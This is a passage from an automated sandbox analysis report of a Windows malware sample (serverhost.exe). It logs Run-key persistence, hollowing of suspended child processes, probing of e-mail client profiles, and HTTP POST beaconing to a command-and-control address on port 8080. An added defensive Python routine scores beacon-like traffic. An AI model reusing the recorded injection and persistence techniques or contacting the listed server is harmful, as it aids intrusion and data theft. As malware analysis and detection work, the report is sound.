wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x773e0000 0x773e5fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory Readable, Writable True False False
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory Readable, Writable True False False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True False False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True False False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True False False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True False False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
For performance reasons, the remaining 35 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\programdata\c570.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\c571.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\c572.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\c572.tmp 0.11 KB (112 bytes) MD5: f10107805ff54bb9c1e1cb047b604439
SHA1: 787f5296c509df55e9dea0f22ea76afaa8953676
SHA256: f4a00adb6eeaf4985068b04cb755ecb8874f7e4fbdd7c8630b0ba96c99b63a68
False
c:\programdata\c571.tmp 0.11 KB (112 bytes) MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
False
Host Behavior
File (10)
Operation Filename Additional Information Success Count
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create Temp File C:\ProgramData\C570.tmp path = C:\ProgramData, prefix = 0 True 1
Create Temp File C:\ProgramData\C571.tmp path = C:\ProgramData, prefix = 0 True 1
Create Temp File C:\ProgramData\C572.tmp path = C:\ProgramData, prefix = 0 True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe type = size True 1
Delete C:\ProgramData\C570.tmp True 1
Delete C:\ProgramData\C571.tmp True 1
Delete C:\ProgramData\C572.tmp True 1
Registry (4)
Operation Key Additional Information Success Count
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ True 1
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ True 1
Process (3)
Operation Process Additional Information Success Count
Create "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" os_pid = 0xc50, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Create "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" os_pid = 0xc58, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Create "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" os_pid = 0xc64, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Thread (9)
Operation Process Additional Information Success Count
Get Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc20 True 1
Get Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc30 True 1
Get Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc24 True 1
Set Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc20 True 1
Set Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc30 True 1
Set Context c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc24 True 1
Resume c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc20 True 1
Resume c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc30 True 1
Resume c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe os_tid = 0xc24 True 1
Memory (12)
Operation Process Additional Information Success Count
Allocate "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Allocate "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400 True 1
Allocate "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 True 1
Get Info "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 True 1
Get Info "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 True 1
Get Info "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 True 1
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" address = 0x400000, size = 114688 True 1
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" address = 0x7ffdf008, size = 4 True 1
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" address = 0x400000, size = 102400 True 1
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" address = 0x7ffdd008, size = 4 True 1
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" address = 0x400000, size = 372736 True 1
Write "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" address = 0x7ffd4008, size = 4 True 1
Module (76)
Operation Module Additional Information Success Count
Load USER32.dll base_address = 0x76890000 True 1
Load KERNEL32.dll base_address = 0x76590000 True 2
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Load ntdll.dll base_address = 0x772a0000 True 1
Load advapi32.dll base_address = 0x764f0000 True 5
Load ole32.dll base_address = 0x77140000 True 1
Load shell32.dll base_address = 0x758a0000 True 4
Load crypt32.dll base_address = 0x755b0000 True 4
Load urlmon.dll base_address = 0x76f00000 True 4
Load userenv.dll base_address = 0x74af0000 True 5
Load wininet.dll base_address = 0x77040000 True 4
Load wtsapi32.dll base_address = 0x74180000 True 5
Load mpr.dll base_address = 0x71dd0000 True 1
Load netapi32.dll base_address = 0x73e90000 True 1
Load SAMCLI.DLL base_address = 0x734e0000 True 1
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe base_address = 0xc40000 True 1
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 7
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x768c69f2 True 1
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x7689dfdc True 1
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2cf31c True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2cf33c True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x2cf41c True 1
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x2cf41c True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2cf41c True 1
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x2cf41c True 1
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x2cf41c True 1
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2cf41c True 1
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2cf41c True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Create Mapping C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Map C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ True 1
Service (1)
Operation Additional Information Success Count
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
System (46)
Operation Additional Information Success Count
Get Computer Name result_out = F71GWAT True 3
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Get Time type = Ticks, time = 110292 True 1
Get Time type = Ticks, time = 111306 True 1
Get Time type = Ticks, time = 112305 True 1
Get Time type = Ticks, time = 113303 True 1
Get Time type = Ticks, time = 114301 True 1
Get Time type = Ticks, time = 115300 True 1
Get Time type = Ticks, time = 116080 True 3
Get Time type = Ticks, time = 116158 True 1
Get Time type = Ticks, time = 116298 True 1
Get Time type = Ticks, time = 116813 True 1
Get Time type = Ticks, time = 117094 True 3
Get Time type = Ticks, time = 117172 True 1
Get Time type = Ticks, time = 117297 True 1
Get Time type = Ticks, time = 118092 True 1
Get Time type = Ticks, time = 118139 True 1
Get Time type = Ticks, time = 118201 True 1
Get Time type = Ticks, time = 118233 True 1
Get Time type = Ticks, time = 118373 True 1
Get Time type = Ticks, time = 119106 True 3
Get Time type = Ticks, time = 119169 True 1
Get Time type = Ticks, time = 119293 True 1
Get Time type = Ticks, time = 120027 True 1
Get Time type = Ticks, time = 120136 True 3
Get Time type = Ticks, time = 120167 True 1
Get Time type = Ticks, time = 120323 True 1
Get Time type = Ticks, time = 121087 True 3
Get Time type = Ticks, time = 121165 True 1
Get Time type = Ticks, time = 121290 True 1
Get Time type = Ticks, time = 121306 True 1
Get Info type = Windows Directory, result_out = C:\Windows True 1
Get Info type = Operating System False 1
Get Info type = Hardware Information True 1
Mutex (4)
Operation Additional Information Success Count
Create mutex_name = MA991ED3B True 1
Create mutex_name = Global\I78B95E2E True 1
Create mutex_name = Global\M78B95E2E True 1
Release mutex_name = Global\I78B95E2E True 1
Network Behavior
HTTP Sessions (2)
Information | Value
Total Data Sent | 0.64 KB (660 bytes)
Total Data Received | 433.95 KB (444360 bytes)
Contacted Host Count | 1
Contacted Hosts | 167.114.121.80
HTTP Session #1
Information | Value
User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Server Name | 167.114.121.80
Server Port | 8080
Username | 0
Password | 0
Data Sent | 0.32 KB (330 bytes)
Data Received | 433.79 KB (444204 bytes)
Operations
Operation | Additional Information | Success | Count
Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG | True | 1
Open Connection | protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 | True | 1
Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD | True | 1
Send HTTP Request | headers = 0 | True | 1
Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 | True | 1
Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 | True | 1
Read Response | size = 444196, size_out = 444196 | True | 1
Read Response | size = 0, size_out = 0 | True | 1
Close Session | | True | 2
HTTP Session #2
Information | Value
User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Server Name | 167.114.121.80
Server Port | 8080
Username | 0
Password | 0
Data Sent | 0.32 KB (330 bytes)
Data Received | 0.15 KB (156 bytes)
Operations
Operation | Additional Information | Success | Count
Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG | True | 1
Open Connection | protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 | True | 1
Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD | True | 1
Send HTTP Request | headers = 0 | True | 1
Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 | True | 1
Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 | True | 1
Read Response | size = 148, size_out = 148 | True | 1
Read Response | size = 0, size_out = 0 | True | 1
Close Session | | True | 2
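Both sessions share the traits of a hand-rolled WinINet beacon: a POST to a bare IPv4 address on port 8080 over cleartext HTTP, no request headers, cookies, authentication or caching (see the INTERNET_FLAG_ values above), and a fixed Windows 7 / IE 7 user agent; the first session pulls back 444196 bytes for 330 sent, the second only 148. The following scoring routine is an added example, not VMRay code or anything from the sample, and runs over constructed proxy-style records built from the two sessions plus two benign requests for contrast; the log format, the signal list and the threshold of three signals are my assumptions.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List
from urllib.parse import urlsplit

# Constructed proxy-style records (not the report's raw logs), one per line:
# <method> <url> <bytes_sent> <bytes_received> <user_agent>
# The first two mirror HTTP Session #1 and #2 above; the last two are benign
# traffic added for contrast.
SAMPLE_LOG = """\
POST http://167.114.121.80:8080/ 330 444204 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
POST http://167.114.121.80:8080/ 330 156 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
GET https://www.example.com/index.html 512 20480 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36
POST https://api.example.org:8443/v1/upload 4096 200 python-requests/2.31
"""

# Windows 7-era Internet Explorer token string, still hard-coded by
# WinINet-based implants long after real browsers stopped sending it.
LEGACY_MSIE_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE [5-8]\.\d; Windows NT ")
DEFAULT_PORTS = {"http": 80, "https": 443}
# A POST that pulls back far more than it sent is a download dressed as a submission.
DOWNLOAD_RATIO = 100


@dataclass
class Finding:
    url: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_request(method: str, url: str, sent: int, recv: int, ua: str) -> Finding:
    """Score one request; each reason is one independent weak signal."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port or DEFAULT_PORTS.get(parts.scheme, 0)
    f = Finding(url=url)
    if is_ip_literal(host):
        f.reasons.append("server addressed by IP literal, no DNS name")
    if port != DEFAULT_PORTS.get(parts.scheme):
        f.reasons.append(f"non-default port {port}")
    if parts.scheme == "http":
        f.reasons.append("cleartext HTTP")
    if method == "POST" and sent > 0 and recv >= DOWNLOAD_RATIO * sent:
        f.reasons.append(f"POST pulled {recv} bytes for {sent} sent (download via POST)")
    if LEGACY_MSIE_UA.match(ua):
        f.reasons.append("hard-coded legacy MSIE user agent")
    f.score = len(f.reasons)
    return f


def analyze(log_text: str) -> List[Finding]:
    """Parse every non-empty line of the constructed log format and score it."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        method, url, sent, recv, ua = line.split(" ", 4)
        findings.append(score_request(method, url, int(sent), int(recv), ua))
    return findings


def suspicious(log_text: str, threshold: int = 3) -> List[Finding]:
    """Requests that accumulate at least `threshold` independent signals."""
    return [f for f in analyze(log_text) if f.score >= threshold]


if __name__ == "__main__":
    for f in suspicious(SAMPLE_LOG):
        print(f.url, f.score, "; ".join(f.reasons))
```

Each signal on its own is weak (plenty of legitimate software talks to IP literals, or still sends an old user agent), which is why the verdict is a count rather than any single match; the two beacon records score 5 and 4, the benign ones 0 and 1.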
Process #12: serverhost.exe
(Host: 25, Network: 0)
Information Value
ID #12
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:25, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:00
OS Process Information
Information Value
PID 0xc50
Parent PID 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xC54
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000130000 0x00130000 0x0022ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000230000 0x00230000 0x002f7fff Pagefile Backed Memory Readable True False False
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory Readable, Writable True False False
private_0x0000000000520000 0x00520000 0x0061ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000620000 0x00620000 0x00720fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x00730000 0x009fefff Memory Mapped File Readable False False False
serverhost.exemh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
pstorec.dll 0x71ec0000 0x71eccfff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x741c0000 0x741d3fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x76670000 0x766eafff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
Injection Information
Injection Type | Source Process | Source OS Thread ID | Injection Info | Success | Count
Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | address = 0x400000, size = 114688 | True | 1
Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | address = 0x7ffdf008, size = 4 | True | 1
Modify Control Flow | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | os_tid = 0xc54, address = 0x0 | True | 1
Host Behavior
File (4)
Operation | Filename | Additional Information | Success | Count
Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost_lng.ini | type = file_attributes | False | 1
Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Profiles | type = file_attributes | False | 1
Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Thunderbird\Profiles | type = file_attributes | False | 1
Get Info | C:\Program Files\Mozilla Thunderbird | type = file_attributes | False | 1
Registry (3)
Operation | Key | Additional Information | Success | Count
Open Key | HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine | | False | 1
Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current | | False | 1
